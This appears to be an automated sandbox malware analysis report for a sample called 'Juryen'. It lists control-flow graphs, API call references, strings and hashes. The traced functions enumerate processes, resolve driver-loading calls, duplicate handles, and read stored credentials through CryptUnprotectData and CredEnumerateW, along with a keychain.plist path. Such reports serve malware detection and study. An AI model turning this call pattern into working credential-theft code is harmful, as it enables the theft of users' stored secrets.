                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                    • String ID: dllhost.exe$p+vw@Fvw@Bvw$taskhost.exe$taskhostex.exe
                                                                    • API String ID: 708747863-11196306
                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 586 413eb7-413ebd 583->586 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 586->587 588 413ebf-413ec6 free 586->588 590 413edb-413ee2 587->590 588->590 597 413ee4 590->597 598 413ee7-413efe 590->598 604 413ea2-413eae CloseHandle 592->604 595 413e61-413e68 593->595 596 413e37-413e44 GetModuleHandleW 593->596 595->592 601 413e6a-413e76 595->601 596->595 600 413e46-413e5c GetProcAddress 596->600 597->598 598->580 600->595 601->592 604->583
                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                    • memset.MSVCRT ref: 00413D7F
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                    • memset.MSVCRT ref: 00413E07
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                    • free.MSVCRT ref: 00413EC1
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                    • CloseHandle.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                    • API String ID: 1344430650-1740548384
                                                                    • Opcode ID: 660cab9a07f681a2bc4137dd77eea26a41ac751a59e67e4b34fef9630b289a87
                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                    • Opcode Fuzzy Hash: 660cab9a07f681a2bc4137dd77eea26a41ac751a59e67e4b34fef9630b289a87
                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                    Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                    • String ID: AE$BIN
                                                                    • API String ID: 1668488027-3931574542
                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                    Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 767404330-0
                                                                    • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                    • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1690352074-0
                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041898C
                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystemmemset
                                                                    • String ID:
                                                                    • API String ID: 3558857096-0
                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004455C2
                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 0044570D
                                                                    • memset.MSVCRT ref: 00445725
                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    • memset.MSVCRT ref: 0044573D
                                                                    • memset.MSVCRT ref: 00445755
                                                                    • memset.MSVCRT ref: 004458CB
                                                                    • memset.MSVCRT ref: 004458E3
                                                                    • memset.MSVCRT ref: 0044596E
                                                                    • memset.MSVCRT ref: 00445A10
                                                                    • memset.MSVCRT ref: 00445A28
                                                                    • memset.MSVCRT ref: 00445AC6
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    • memset.MSVCRT ref: 00445B52
                                                                    • memset.MSVCRT ref: 00445B6A
                                                                    • memset.MSVCRT ref: 00445C9B
                                                                    • memset.MSVCRT ref: 00445CB3
                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                    • memset.MSVCRT ref: 00445B82
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                    • memset.MSVCRT ref: 00445986
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                    • API String ID: 1963886904-3798722523
                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                    Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                    • API String ID: 2744995895-28296030
                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                    Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                    • memset.MSVCRT ref: 0040B756
                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
